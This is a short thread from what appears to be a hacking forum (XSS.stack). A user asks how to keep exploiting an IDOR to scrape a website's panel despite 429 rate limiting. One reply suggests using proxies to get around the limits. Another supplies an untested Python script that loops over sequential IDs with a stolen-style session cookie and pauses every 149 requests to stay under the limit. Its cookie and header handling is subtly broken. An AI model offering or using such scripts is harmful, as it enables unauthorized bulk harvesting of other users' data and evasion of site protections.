• XSS.stack #1 – первый литературный журнал от юзеров форума

IDOR with limit 429 [ question ]

Hello i am scrapping a panel of a website, after 150 request i am getting 429, then have to wait 30 second,
am using burp intruder, anyway to make it stop after 150 request, wait 30 second, then continue 150, then wait 30 second ..
is it in-house technology that is limiting you or something like cloudflare?

you could try using proxies but if it's authenticated they could be limiting by session
 
Пожалуйста, обратите внимание, что пользователь заблокирован
I haven't test it yet, but your python script should looks like this below script:
Python:
import requests
import time
cookie = "session: yoursessionid"
for i in range(99999):
    params = {"id": i}
    cookies = {"Cookies:": cookie}
    requests.get("https://www.example.com/xyz", params=params, headers=cookies)
    if i % 149 == 0:
        time.sleep(30)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх